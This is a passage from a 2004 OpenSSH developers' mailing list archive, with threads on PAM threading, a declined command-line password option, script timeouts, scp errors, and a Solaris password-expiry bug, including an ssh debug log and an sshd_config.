-dmypassword user at host > >[SNIP] > >Thank you, >Martin Kluge > > From postadal at suse.cz Tue Mar 2 03:41:24 2004 
From: postadal at suse.cz (Petr Ostadal) Date: Mon, 1 Mar 2004 17:41:24 +0100 (CET) Subject: Change request For OpenSSH 3.8p1 In-Reply-To: References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> Message-ID: Hi, I tested 3.8p1 and it seems that pam_krb5 has been working without threads already. I think the bug can be closed for 3.8p1. Petr On Mon, 1 Mar 2004, Petr Ostadal wrote: > Hi all, > > I don't like continue this flame if we have or haven't the threads. > > I ask, how can solve problems which forking have (see bug > http://bugzilla.mindrot.org/show_bug.cgi?id=768). Without threads the > pam_krb5 and others pam modules doesn't work (in bugs is nicely described > where is the problems). > > Thnx in advance for your answer. > > Petr > > -- > Best Regards, > > Petr Ostadal > Software Developer > --------------------------------------------------------------------- > SuSE CR, s.r.o. e-mail: postadal at suse.cz > Drahobejlova 27 tel: +420 296 542 382 > 190 00 Praha 9 fax: +420 296 542 374 > Czech Republic http://www.suse.cz > > On Mon, 1 Mar 2004, Damien Miller wrote: > > > I've been away from mail for a couple of days, so I am catching up on this > > rather amusing thread. > > > > On Sat, 28 Feb 2004, John Davidorff Pell wrote: > > > > > I'm not terribly interested in having threads or not having threads, it > > > was the This Will Never Happen Because I Say So And Am G-d attitude > > > that shocked me. > > > > It isn't because "I" say so - you are making incorrect assumptions. For > > instance, if I just did what I wanted, threads would have been removed by > > now (and probably a bit more too). > > > > I am quite sure that I speak for all the developers when I say that we > > don't want threads used in OpenSSH. > > > > -d > > > > _______________________________________________ > > openssh-unix-dev mailing list > > openssh-unix-dev at mindrot.org > > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > > > From dtucker at zip.com.au Tue Mar 16 13:45:12 2004
From: dtucker at zip.com.au (Darren Tucker) Date: Tue, 16 Mar 2004 13:45:12 +1100 Subject: Feature request In-Reply-To: <20040314174835.GA10974@foo.birdnet.se> References: <20040314165513.GB11417@elxsi.de> <20040314174835.GA10974@foo.birdnet.se> Message-ID: <40566A38.4030600@zip.com.au> Peter Stuge wrote: > On Sun, Mar 14, 2004 at 05:55:13PM +0100, Martin Kluge wrote: >>So would you accept a patch to add a new command line option >>(suggestion: -d) to specify a password directly on the command line? > > This has been requested before but declined because it promotes insecure > behavior. (Your system may be isolated, but all aren't and it's usually > possible to see any arguments of all processes in the system.) > > I seem to remember discussion about accepting the password on a file > descriptor however. Search the mailing list and bugzilla.mindrot.org. Probably this one: http://bugzilla.mindrot.org/show_bug.cgi?id=69 -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From roland.mainz at nrubsig.org Tue Mar 16 15:20:07 2004 From: roland.mainz at nrubsig.org (Roland Mainz) Date: Tue, 16 Mar 2004 05:20:07 +0100 Subject: Support for forwarding more than one X11 display... Message-ID: <40568077.13EDB8BD@nrubsig.org> Hi! ---- Would it be possible to forward multiple X11 displays using the current ssh2 _protocol_ ? ---- Bye, Roland -- __ . . __ (o.\ \/ /.o) roland.mainz at nrubsig.org \__\/\/__/ MPEG specialist, C&&JAVA&&Sun&&Unix programmer /O /==\ O\ TEL +49 2426 901568 FAX +49 2426 901569 (;O/ \/ \O;) From Steve.Belt at motorola.com Wed Mar 17 03:50:40 2004
From: Steve.Belt at motorola.com (Steve Belt (rgpg70)) Date: Tue, 16 Mar 2004 10:50:40 -0600 Subject: ssh timeout Message-ID: <40573060.3050601@motorola.com> Hello, I am wondering if there is any way I can get ssh to timeout (return) if nothing is entered when prompted for a password? I understand there is a LoginGraceTime value that can be used in the sshd_config file, but that still doesn't make ssh return (exit) when no password is ever entered. The command just hangs until a is pressed. Is there any way to make it return after the LoginGraceTime limit has expired? I am using ssh inside a script that cycles over several hosts. If a host does not have an updated authorized_keys file, it prompts for a password. The script then hangs while ssh waits for an answer. I would like ssh to return (exit) eventually so the script can continue. Thanks, -- Steve "Wheat" Belt Motorola, Inc. Steve.Belt at motorola.com 6501 William Cannon Dr. West, MD OE341 512-895-2268 Austin, TX 78735 From postadal at suse.cz Wed Mar 17 09:14:11 2004
From: postadal at suse.cz (Petr Ostadal) Date: Tue, 16 Mar 2004 22:14:11 -0000 Subject: Change request For OpenSSH 3.8p1 In-Reply-To: References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> Message-ID: Hi all, I don't like continue this flame if we have or haven't the threads. I ask, how can solve problems which forking have (see bug http://bugzilla.mindrot.org/show_bug.cgi?id=768). Without threads the pam_krb5 and others pam modules doesn't work (in bugs is nicely described where is the problems). Thnx in advance for your answer. Petr -- Best Regards, Petr Ostadal Software Developer --------------------------------------------------------------------- SuSE CR, s.r.o. e-mail: postadal at suse.cz Drahobejlova 27 tel: +420 296 542 382 190 00 Praha 9 fax: +420 296 542 374 Czech Republic http://www.suse.cz On Mon, 1 Mar 2004, Damien Miller wrote: > I've been away from mail for a couple of days, so I am catching up on this > rather amusing thread. > > On Sat, 28 Feb 2004, John Davidorff Pell wrote: > > > I'm not terribly interested in having threads or not having threads, it > > was the This Will Never Happen Because I Say So And Am G-d attitude > > that shocked me. > > It isn't because "I" say so - you are making incorrect assumptions. For > instance, if I just did what I wanted, threads would have been removed by > now (and probably a bit more too). > > I am quite sure that I speak for all the developers when I say that we > don't want threads used in OpenSSH. > > -d > > _______________________________________________ > openssh-unix-dev mailing list > openssh-unix-dev at mindrot.org > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev > From djm at mindrot.org Wed Mar 17 09:28:13 2004
From: djm at mindrot.org (Damien Miller) Date: Wed, 17 Mar 2004 09:28:13 +1100 Subject: Change request For OpenSSH 3.8p1 In-Reply-To: References: <6120CD44-6A46-11D8-9F3D-0003934F6406@mac.com> Message-ID: <40577F7D.4020300@mindrot.org> Petr Ostadal wrote: > Hi all, > > I don't like continue this flame if we have or haven't the threads. > > I ask, how can solve problems which forking have (see bug > http://bugzilla.mindrot.org/show_bug.cgi?id=768). Without threads the > pam_krb5 and others pam modules doesn't work (in bugs is nicely described > where is the problems). I mentioned several approaches back at the start of the thread. -d From dtucker at zip.com.au Wed Mar 17 16:45:30 2004
From: dtucker at zip.com.au (Darren Tucker) Date: Wed, 17 Mar 2004 16:45:30 +1100 Subject: ssh timeout In-Reply-To: <40573060.3050601@motorola.com> References: <40573060.3050601@motorola.com> Message-ID: <4057E5FA.9090304@zip.com.au> Steve Belt (rgpg70) wrote: > I am wondering if there is any way I can get ssh to timeout (return) if > nothing is entered when prompted for a password? I understand there is > a LoginGraceTime value that can be used in the sshd_config file, but > that still doesn't make ssh return (exit) when no password is ever > entered. The command just hangs until a is pressed. Is there > any way to make it return after the LoginGraceTime limit has expired? > I am using ssh inside a script that cycles over several hosts. If a > host does not have an updated authorized_keys file, it prompts for a > password. The script then hangs while ssh waits for an answer. I would > like ssh to return (exit) eventually so the script can continue. (Assuming you're using OpenSSH since you crossposted to openssh-unix-dev) You could use "ssh -o PreferredAuthentications=hostbased,publickey yourhost" so it won't try password or keyboard-interactive. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From Steve.Belt at motorola.com Thu Mar 18 02:16:02 2004
From: Steve.Belt at motorola.com (Steve Belt (rgpg70)) Date: Wed, 17 Mar 2004 09:16:02 -0600 Subject: ssh timeout References: <40573060.3050601@motorola.com> <4057E5FA.9090304@zip.com.au> Message-ID: <40586BB2.2080908@motorola.com> Thanks for the info, Darren. That worked for me. Appreciate it. :) Cheers, Steve Darren Tucker wrote: > Steve Belt (rgpg70) wrote: > >> I am wondering if there is any way I can get ssh to timeout (return) >> if nothing is entered when prompted for a password? I understand >> there is a LoginGraceTime value that can be used in the sshd_config >> file, but that still doesn't make ssh return (exit) when no password >> is ever entered. The command just hangs until a is >> pressed. Is there any way to make it return after the LoginGraceTime >> limit has expired? I am using ssh inside a script that cycles over >> several hosts. If a host does not have an updated authorized_keys >> file, it prompts for a password. The script then hangs while ssh >> waits for an answer. I would like ssh to return (exit) eventually so >> the script can continue. > > > (Assuming you're using OpenSSH since you crossposted to openssh-unix-dev) > > You could use "ssh -o PreferredAuthentications=hostbased,publickey > yourhost" so it won't try password or keyboard-interactive. > -- Steve "Wheat" Belt Motorola, Inc. Steve.Belt at motorola.com 6501 William Cannon Dr. West, MD OE341 512-895-2268 Austin, TX 78735 From yhu_2003 at yahoo.com Thu Mar 18 13:23:57 2004
From: yhu_2003 at yahoo.com (Eric Hu) Date: Wed, 17 Mar 2004 18:23:57 -0800 (PST) Subject: scp does not work Message-ID: <20040318022357.6216.qmail@web60103.mail.yahoo.com> Hi, I got a word "HELLO" after I type scp file server:. and nothing was transferred. There was also a warning message: Executing scp1 compatibility. I am running OpenSSH_3.6.1p1+CAN-2003-0693, SSH protocols 1.5/2.0, OpenSSL 0x0090702f in Mac OSX panther. Thanks. Eric From djm at mindrot.org Thu Mar 18 13:47:05 2004 From: djm at mindrot.org (Damien Miller) Date: Thu, 18 Mar 2004 13:47:05 +1100 Subject: scp does not work In-Reply-To: <20040318022357.6216.qmail@web60103.mail.yahoo.com> References: <20040318022357.6216.qmail@web60103.mail.yahoo.com> Message-ID: <40590DA9.1050902@mindrot.org> Eric Hu wrote: > Hi, I got a word "HELLO" after I type scp file > server:. and nothing was transferred. There was also a > warning message: Executing scp1 compatibility. OpenSSH doesn't make that message. See also http://www.openssh.com/faq.html#2.9 -d From imhaeuse at physik.uni-wuppertal.de Fri Mar 19 01:36:40 2004 From: imhaeuse at physik.uni-wuppertal.de (Martin Imhäuser) Date: Thu, 18 Mar 2004 15:36:40 +0100 Subject: ssh only with password Message-ID: <200403181536.40609.imhaeuse@physik.uni-wuppertal.de> Hello, I must relogin on the same machine in my shell with ssh and without password. For this I tried the procedure ssh-keygen -t dsa and ssh-keygen -t rsa. I copied the entries in /.ssh/id_dsa.pub and /.ssh/id_rsa.pub in /.ssh/authorized_keys When I open a shell I type exec ssh-agent $SHELL and then ssh-add and give my passphrases. When I now type ssh machinename my PC wants my password. I am running Redhat 7.3.3 and, sorry, I am a beginner using Linux. Thank you in advance, Martin From kmack at sgi.sk.ca Fri Mar 19 09:49:30 2004
From: kmack at sgi.sk.ca (Kevin Mack) Date: Thu, 18 Mar 2004 16:49:30 -0600 Subject: 3.8p1 password expiry, Solaris 8 Message-ID: <20040318224930.GA22788@gibraltar> I can't seem to get the /etc/shadow password expiry working on 3.8p1 on Solaris 8. It works fine with 3.7.1p2 and pwexp26. Logins aren't affected after a 'passwd -df' or 'passwd -f'. Here's the configure, using gcc 3.2: --prefix=/usr --sysconfdir=/etc/ssh --with-tcp-wrappers \ --without-pam --libexecdir=/usr/sbin --mandir=/usr/share/man \ --with-shadow 'uname -a' output: SunOS tech04 5.8 Generic_108528-24 sun4u sparc SUNW,UltraAX-i2 'ssh -V': OpenSSH_3.8.p1-pwexp26, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 'ssh -vvv ' output: OpenSSH_3.7.1p2, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 debug1: Reading configuration data /etc/ssh/ssh_config debug3: cipher ok: blowfish-cbc [blowfish-cbc] debug3: ciphers ok: [blowfish-cbc] debug2: ssh_connect: needpriv 0 debug1: Connecting to tech04 [172.21.2.140] port 22. debug1: Connection established. debug1: identity file /home/kevin/.ssh/identity type -1 debug1: identity file /home/kevin/.ssh/id_rsa type -1 debug3: Not a RSA1 key file /home/kevin/.ssh/id_dsa. 
debug2: key_type_from_name: unknown key type '-----BEGIN' debug3: key_read: missing keytype debug2: key_type_from_name: unknown key type 'Proc-Type:' debug3: key_read: missing keytype debug2: key_type_from_name: unknown key type 'DEK-Info:' debug3: key_read: missing keytype debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug3: key_read: missing whitespace debug2: key_type_from_name: unknown key type '-----END' debug3: key_read: missing keytype debug1: identity file /home/kevin/.ssh/id_dsa type 2 debug1: Remote protocol version 2.0, remote software version OpenSSH_3.8p1-pwexp26 debug1: match: OpenSSH_3.8p1-pwexp26 pat OpenSSH* debug1: Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_3.7.1p2 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: blowfish-cbc debug2: kex_parse_kexinit: blowfish-cbc debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc at 
lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc at lysator.liu.se,aes128-ctr,aes192-ctr,aes256-ctr debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: mac_init: found hmac-md5 debug1: kex: server->client blowfish-cbc hmac-md5 none debug2: mac_init: found hmac-md5 debug1: kex: client->server blowfish-cbc hmac-md5 none debug1: SSH2_MSG_KEX_DH_GEX_REQUEST sent debug1: expecting SSH2_MSG_KEX_DH_GEX_GROUP debug2: dh_gen_key: priv key bits set: 130/256 debug2: bits set: 1599/3191 debug1: SSH2_MSG_KEX_DH_GEX_INIT sent debug1: expecting SSH2_MSG_KEX_DH_GEX_REPLY debug3: check_host_in_hostfile: filename /home/kevin/.ssh/known_hosts debug3: check_host_in_hostfile: match line 65 debug3: check_host_in_hostfile: filename /home/kevin/.ssh/known_hosts debug3: check_host_in_hostfile: match line 65 debug1: Host 'tech04' is known and matches the RSA host key. 
debug1: Found key in /home/kevin/.ssh/known_hosts:65 debug2: bits set: 1586/3191 debug1: ssh_rsa_verify: signature correct debug2: kex_derive_keys debug2: set_newkeys: mode 1 debug1: SSH2_MSG_NEWKEYS sent debug1: expecting SSH2_MSG_NEWKEYS debug2: set_newkeys: mode 0 debug1: SSH2_MSG_NEWKEYS received debug1: SSH2_MSG_SERVICE_REQUEST sent debug2: service_accept: ssh-userauth debug1: SSH2_MSG_SERVICE_ACCEPT received debug2: key: /home/kevin/.ssh/id_dsa (0x808e580) debug2: key: /home/kevin/.ssh/identity ((nil)) debug2: key: /home/kevin/.ssh/id_rsa ((nil)) debug1: Authentications that can continue: publickey,password,keyboard-interactive debug3: start over, passed a different list publickey,password,keyboard-interactive debug3: preferred publickey,keyboard-interactive,password debug3: authmethod_lookup publickey debug3: remaining preferred: keyboard-interactive,password debug3: authmethod_is_enabled publickey debug1: Next authentication method: publickey debug1: Offering public key: /home/kevin/.ssh/id_dsa debug3: send_pubkey_test debug2: we sent a publickey packet, wait for reply debug1: Server accepts key: pkalg ssh-dss blen 434 debug2: input_userauth_pk_ok: fp b2:6f:21:29:25:46:cf:04:0d:c6:18:d4:20:77:71:18 debug3: sign_and_send_pubkey debug1: Authentication succeeded (publickey). debug1: channel 0: new [client-session] debug3: ssh_session2_open: channel_new: 0 debug2: channel 0: send open debug1: Entering interactive session. 
debug2: callback start debug2: ssh_session2_setup: id 0 debug2: channel 0: request pty-req debug3: tty_make_modes: ospeed 38400 debug3: tty_make_modes: ispeed 38400 debug3: tty_make_modes: 1 3 debug3: tty_make_modes: 2 28 debug3: tty_make_modes: 3 8 debug3: tty_make_modes: 4 21 debug3: tty_make_modes: 5 4 debug3: tty_make_modes: 6 0 debug3: tty_make_modes: 7 0 debug3: tty_make_modes: 8 17 debug3: tty_make_modes: 9 19 debug3: tty_make_modes: 10 26 debug3: tty_make_modes: 12 18 debug3: tty_make_modes: 13 23 debug3: tty_make_modes: 14 22 debug3: tty_make_modes: 18 15 debug3: tty_make_modes: 30 1 debug3: tty_make_modes: 31 0 debug3: tty_make_modes: 32 0 debug3: tty_make_modes: 33 0 debug3: tty_make_modes: 34 0 debug3: tty_make_modes: 35 0 debug3: tty_make_modes: 36 1 debug3: tty_make_modes: 37 0 debug3: tty_make_modes: 38 1 debug3: tty_make_modes: 39 0 debug3: tty_make_modes: 40 0 debug3: tty_make_modes: 41 1 debug3: tty_make_modes: 50 1 debug3: tty_make_modes: 51 1 debug3: tty_make_modes: 52 0 debug3: tty_make_modes: 53 1 debug3: tty_make_modes: 54 1 debug3: tty_make_modes: 55 1 debug3: tty_make_modes: 56 0 debug3: tty_make_modes: 57 0 debug3: tty_make_modes: 58 0 debug3: tty_make_modes: 59 1 debug3: tty_make_modes: 60 1 debug3: tty_make_modes: 61 1 debug3: tty_make_modes: 62 0 debug3: tty_make_modes: 70 1 debug3: tty_make_modes: 71 0 debug3: tty_make_modes: 72 1 debug3: tty_make_modes: 73 0 debug3: tty_make_modes: 74 0 debug3: tty_make_modes: 75 0 debug3: tty_make_modes: 90 1 debug3: tty_make_modes: 91 1 debug3: tty_make_modes: 92 0 debug3: tty_make_modes: 93 0 debug2: x11_get_proto: /usr/X11R6/bin/xauth list :0.0 2>/dev/null debug1: Requesting X11 forwarding with authentication spoofing. debug2: channel 0: request x11-req debug1: Requesting authentication agent forwarding. 
debug2: channel 0: request auth-agent-req at openssh.com debug2: channel 0: request shell debug2: fd 3 setting TCP_NODELAY debug2: callback done debug2: channel 0: open confirm rwindow 0 rmax 32768 debug2: channel 0: rcvd adjust 131072 Last login: Thu Mar 18 16:32:16 2004 from 2k144158 Sun Microsystems Inc. SunOS 5.8 Generic Patch October 2001 tech04 /export/home/kevin >exit logout debug1: client_input_channel_req: channel 0 rtype exit-status reply 0 debug2: channel 0: rcvd eof debug2: channel 0: output open -> drain debug2: channel 0: obuf empty debug2: channel 0: close_write debug2: channel 0: output drain -> closed debug2: channel 0: rcvd close debug2: channel 0: close_read debug2: channel 0: input open -> closed debug3: channel 0: will not send data after close debug2: channel 0: almost dead debug2: channel 0: gc: notify user debug2: channel 0: gc: user detached debug2: channel 0: send close debug2: channel 0: is dead debug2: channel 0: garbage collecting debug1: channel 0: free: client-session, nchannels 1 debug3: channel 0: status: The following connections are open: #0 client-session (t4 r0 i3/0 o3/0 fd -1/-1) debug3: channel 0: close_fds r -1 w -1 e 6 Connection to tech04 closed. debug1: Transferred: stdin 0, stdout 0, stderr 30 bytes in 1.6 seconds debug1: Bytes per second: stdin 0.0, stdout 0.0, stderr 18.9 debug1: Exit status 0 Contents of /etc/ssh/sshd_config: # $OpenBSD: sshd_config,v 1.65 2003/08/28 12:54:34 markus Exp $ # This is the sshd server system-wide configuration file. See # sshd_config(5) for more information. # This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin # The strategy used for options in the default sshd_config shipped with # OpenSSH is to specify options with their default value where # possible, but leave them commented. Uncommented options change a # default value. 
#Port 22 #Protocol 2,1 Protocol 2 #ListenAddress 0.0.0.0 #ListenAddress :: # HostKey for protocol version 1 #HostKey /etc/ssh/ssh_host_key # HostKeys for protocol version 2 #HostKey /etc/ssh/ssh_host_rsa_key #HostKey /etc/ssh/ssh_host_dsa_key # Lifetime and size of ephemeral version 1 server key #KeyRegenerationInterval 1h KeyRegenerationInterval 1800 #ServerKeyBits 768 ServerKeyBits 1024 # Logging #obsoletes QuietMode and FascistLogging #SyslogFacility AUTH #LogLevel INFO # Authentication: #LoginGraceTime 2m LoginGraceTime 60 #PermitRootLogin yes PermitRootLogin without-password #StrictModes yes #RSAAuthentication yes #PubkeyAuthentication yes #AuthorizedKeysFile .ssh/authorized_keys # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts #RhostsRSAAuthentication no # similar for protocol version 2 #HostbasedAuthentication no # Change to yes if you don't trust ~/.ssh/known_hosts for # RhostsRSAAuthentication and HostbasedAuthentication #IgnoreUserKnownHosts no IgnoreUserKnownHosts yes # Don't read the user's ~/.rhosts and ~/.shosts files #IgnoreRhosts yes # To disable tunneled clear text passwords, change to no here! #PasswordAuthentication yes #PermitEmptyPasswords no # Change to no to disable s/key passwords #ChallengeResponseAuthentication yes # Kerberos options #KerberosAuthentication no #KerberosOrLocalPasswd yes #KerberosTicketCleanup yes # GSSAPI options #GSSAPIAuthentication no #GSSAPICleanupCreds yes # Set this to 'yes' to enable PAM authentication (via challenge-response) # and session processing. 
Depending on your PAM configuration, this may # bypass the setting of 'PasswordAuthentication' #UsePAM yes #AllowTcpForwarding yes #GatewayPorts no GatewayPorts yes #X11Forwarding no X11Forwarding yes #X11DisplayOffset 10 #X11UseLocalhost yes #PrintMotd yes #PrintLastLog yes #KeepAlive yes #UseLogin no #UsePrivilegeSeparation yes #PermitUserEnvironment no #Compression yes #ClientAliveInterval 0 #ClientAliveCountMax 3 #UseDNS yes #PidFile /var/run/sshd.pid #MaxStartups 10 MaxStartups 20 # no default banner path #Banner /some/path # override default of no subsystems Subsystem sftp /usr/sbin/sftp-server --- From dtucker at zip.com.au Fri Mar 19 10:15:35 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 10:15:35 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <20040318224930.GA22788@gibraltar> References: <20040318224930.GA22788@gibraltar> Message-ID: <405A2D97.4030809@zip.com.au> Kevin Mack wrote: > I can't seem to get the /etc/shadow password expiry working on > 3.8p1 on Solaris 8. It works fine with 3.7.1p2 and pwexp26. > Logins aren't affected after a 'passwd -df' or 'passwd -f'. [...] > 'ssh -V': > OpenSSH_3.8.p1-pwexp26, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 I never released a pwexp patch for 3.8p1, where did you get that? > debug2: we sent a publickey packet, wait for reply > debug1: Server accepts key: pkalg ssh-dss blen 434 The password expiry code in 3.8p1 is only checked for password or keyboard-interactive authentications. It does not get checked for public-key (or hostbased) logins. I posted a more detailed explanation of the differences a while back: http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From kmack at sgi.sk.ca Fri Mar 19 10:46:15 2004
From: kmack at sgi.sk.ca (Kevin Mack) Date: Thu, 18 Mar 2004 17:46:15 -0600 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A2D97.4030809@zip.com.au> References: <20040318224930.GA22788@gibraltar> <405A2D97.4030809@zip.com.au> Message-ID: <20040318234615.GA22990@gibraltar> On Fri, Mar 19, 2004 at 10:15:35AM +1100, Darren Tucker wrote: > Kevin Mack wrote: > >I can't seem to get the /etc/shadow password expiry working on > >3.8p1 on Solaris 8. It works fine with 3.7.1p2 and pwexp26. > >Logins aren't affected after a 'passwd -df' or 'passwd -f'. > [...] > >'ssh -V': > >OpenSSH_3.8.p1-pwexp26, SSH protocols 1.5/2.0, OpenSSL 0.9.7c 30 Sep 2003 > > I never released a pwexp patch for 3.8p1, where did you get that? Oops, I edited version.h for some reason! Otherwise, it's a straight 3.8p1. > >debug2: we sent a publickey packet, wait for reply > >debug1: Server accepts key: pkalg ssh-dss blen 434 > > The password expiry code in 3.8p1 is only checked for password or > keyboard-interactive authentications. It does not get checked for > public-key (or hostbased) logins. > > I posted a more details explanation of the differences a while back: > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 Thanks Darren, we'll use 3.7.1p2 for now. From dberezin at acs.rutgers.edu Fri Mar 19 10:50:31 2004 From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Thu, 18 Mar 2004 18:50:31 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <405A2D97.4030809@zip.com.au> Message-ID: <009401c40d43$cc328790$5bd90680@acsdev78> I have just tried expiring a password on Solaris 9 box running 3.8p1 and it works with keyboard-interactive authentication, but does not work with password authentication. If I just expire password with passwd -f, then I simply get permission denied. If I also clear it, passwd -df, then I first get a prompt for the password and then permission denied. -Dmitry. From dberezin at acs.rutgers.edu Fri Mar 19 11:02:33 2004
From: dberezin at acs.rutgers.edu (Dmitry Berezin) Date: Thu, 18 Mar 2004 19:02:33 -0500 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009401c40d43$cc328790$5bd90680@acsdev78> Message-ID: <009501c40d45$7ababf20$5bd90680@acsdev78> Oops, bad test. (I must have forgotten to restart sshd after making changes to sshd_config.) Here are the correct results: after running passwd -f, I get prompt for password and after typing correct password, I get "Connection closed by ". Using passwd -df simply results in three prompts for password and permission denied after that (This must be the result of PermitEmptyPasswords=no). -Dmitry. From dtucker at zip.com.au Fri Mar 19 11:03:54 2004
From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:03:54 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009401c40d43$cc328790$5bd90680@acsdev78> References: <009401c40d43$cc328790$5bd90680@acsdev78> Message-ID: <405A38EA.4070905@zip.com.au> Dmitry Berezin wrote: > I have just tried expiring a password on Solaris 9 box running 3.8p1 and it > works with keyboard-interactive authentication, but does not work with > password authentication. If I just expire password with passwd -f, then I > simply get permission denied. If I also clear it, passwd -df, then I first > get a prompt for the password and then permission denied. In the password auth case, is that with UsePAM=no? Can you send the server-side debugging for the case where it doesn't work? -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Fri Mar 19 11:11:23 2004 
From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:11:23 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <009501c40d45$7ababf20$5bd90680@acsdev78> References: <009501c40d45$7ababf20$5bd90680@acsdev78> Message-ID: <405A3AAB.4070001@zip.com.au> Dmitry Berezin wrote: > Oops, bad test. (I must have forgotten to restart sshd after making changes > to sshd_config. Here are the correct results: after running passwd -f, I get > prompt for password and after typing correct password, I get "Connection > closed by ". That, unfortunately, is a bug. For details, and a patch, see: http://bugzilla.mindrot.org/show_bug.cgi?id=808 > Using passwd -df simply results in three prompts for > password and permission denied after that (This must be the result of > PermitEmptyPasswords=no). Yes, that is most likely because of PermitEmptyPasswords. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dtucker at zip.com.au Fri Mar 19 11:12:58 2004
From: dtucker at zip.com.au (Darren Tucker) Date: Fri, 19 Mar 2004 11:12:58 +1100 Subject: 3.8p1 password expiry, Solaris 8 In-Reply-To: <20040318234615.GA22990@gibraltar> References: <20040318224930.GA22788@gibraltar> <405A2D97.4030809@zip.com.au> <20040318234615.GA22990@gibraltar> Message-ID: <405A3B0A.30101@zip.com.au> Kevin Mack wrote: > On Fri, Mar 19, 2004 at 10:15:35AM +1100, Darren Tucker wrote: >>I posted a more details explanation of the differences a while back: >>http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=107650523726292 > > Thanks Darren, we'll use 3.7.1p2 for now. Do you need password expiry for non-password authentications? -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. From dberezin at acs.rutgers.edu Fri Mar 19 11:32:02 2004 
